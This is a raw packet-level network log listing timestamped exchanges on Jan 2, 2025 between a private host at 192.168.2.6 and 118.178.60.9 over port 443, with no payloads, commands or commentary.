Jan 2, 2025 12:15:37.945262909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.948703051 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.948771000 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.948837042 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.948909998 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.963669062 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.963717937 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.963725090 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.963733912 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.963759899 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.963788986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.966815948 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.966849089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.966866970 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.966872931 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.966896057 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.966913939 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.970324993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.970386982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.970391035 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.970402956 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.970442057 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.978689909 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.978744984 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.978851080 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.978894949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.988276005 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.006489992 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.006544113 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.007322073 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.007411957 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.008447886 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.015782118 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.015822887 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.015851021 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.015945911 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.018850088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.018918037 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.018929005 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.018944979 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.018965006 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.019009113 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.025854111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.025913000 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.028311968 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.028395891 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.028460979 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.028507948 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.033407927 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.033451080 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.033468962 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.033485889 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.033591986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.036098003 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.036159992 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.036183119 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.036225080 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.039696932 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.039737940 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.039758921 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.039767981 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.039844036 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.039865971 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.054519892 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.054563999 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.054614067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.054627895 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.054673910 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.054688931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.057619095 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.057677031 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.057828903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.057881117 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.061356068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.061420918 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.061435938 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.061446905 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.061479092 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.061887026 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.069753885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.069792032 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.069818020 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.069829941 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.069847107 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.069890022 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.098246098 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.098290920 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.098320007 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.098341942 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.098373890 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.098400116 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.098967075 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099020958 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099157095 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099210024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099319935 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099373102 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099514961 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099565983 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099850893 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099884987 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099920034 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099926949 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.099940062 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.099967003 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.100014925 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.100073099 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.100464106 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.100537062 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.103482962 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.103517056 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.103545904 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.103553057 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.103565931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.103594065 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.110019922 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.110058069 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.110079050 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.110085964 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.110111952 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.110143900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.117429018 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.117486000 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.118128061 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.118175983 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.119975090 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.120027065 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.120122910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.120172024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.125057936 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.125091076 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.125121117 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.125128984 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.125186920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.125186920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.127194881 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.127232075 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.127244949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.127250910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.127266884 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.127294064 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.130600929 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.130650043 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.130717993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.130760908 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.145447016 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.145507097 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.145517111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.145529032 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.145587921 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.148637056 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.148689985 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.148758888 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.148808002 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.152199030 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.152251959 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.152281046 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.152338982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.160710096 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.160768986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.160799026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.160851002 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.183072090 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.188507080 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.188574076 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.188595057 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.188664913 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.189249039 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.189297915 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.189407110 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.189460039 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.189577103 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.189625025 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.189728022 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.189778090 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.189888954 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.189939022 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.190006018 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.190056086 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.190339088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.190386057 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.190396070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.190443039 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.194309950 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.194360971 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.194360971 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.194370985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.194402933 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.200700998 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.200763941 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.200772047 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.200845003 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.207617998 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.207673073 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.207844019 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.207892895 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.210448980 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.210617065 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.210628986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.210653067 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.210695982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.210705996 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.215331078 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.215415001 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.215423107 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.215475082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.218245029 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.218310118 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.218388081 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.218437910 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.221673965 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.221723080 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.221724987 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.221733093 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.221787930 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.221823931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.236521006 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.236586094 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.236629009 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.236646891 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.236696959 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.236717939 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.239619970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.239676952 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.239834070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.239886999 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.243254900 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.243299007 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.243330956 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.243339062 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.243354082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.243379116 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.251702070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.251779079 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.251816988 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.251883984 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.279496908 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.279582977 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.279594898 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.279627085 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.279656887 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.279683113 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.280203104 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.280261040 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.280375004 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.280433893 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.280637026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.280688047 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.280721903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.280776024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.280930042 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.280982018 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.281161070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.281208992 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.281212091 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.281225920 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.281260967 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.281274080 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.281577110 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.281625986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.285326004 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.285388947 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.285417080 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.285466909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.291753054 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.291806936 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.291884899 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.291932106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.298837900 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.298887014 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.298911095 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.298921108 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.298945904 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.298974991 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.301183939 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.301237106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.301320076 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.301372051 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.306303978 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.306385994 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.306504011 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.306555986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.309194088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.309257984 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.309370995 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.309422970 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.312588930 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.312629938 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.312653065 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.312671900 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.312688112 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.312716961 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.327675104 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.327716112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.327747107 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.327753067 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.327785015 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.327802896 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.330694914 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.330745935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.330756903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.330771923 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.330806017 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.330840111 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.334244967 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.334292889 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.334306002 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.334320068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.334336996 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.334357977 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.342683077 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.342761993 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.342812061 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.342879057 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.551346064 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.551405907 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619009018 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619038105 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619054079 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619106054 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619116068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619138002 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619179010 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619193077 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619220972 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619229078 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619271040 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619276047 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619324923 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619333029 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619349003 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619370937 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619376898 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619448900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619563103 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.619570017 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.619628906 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.831326962 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:38.831844091 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:38.992906094 CET	49996	443	192.168.2.6	118.178.60.9
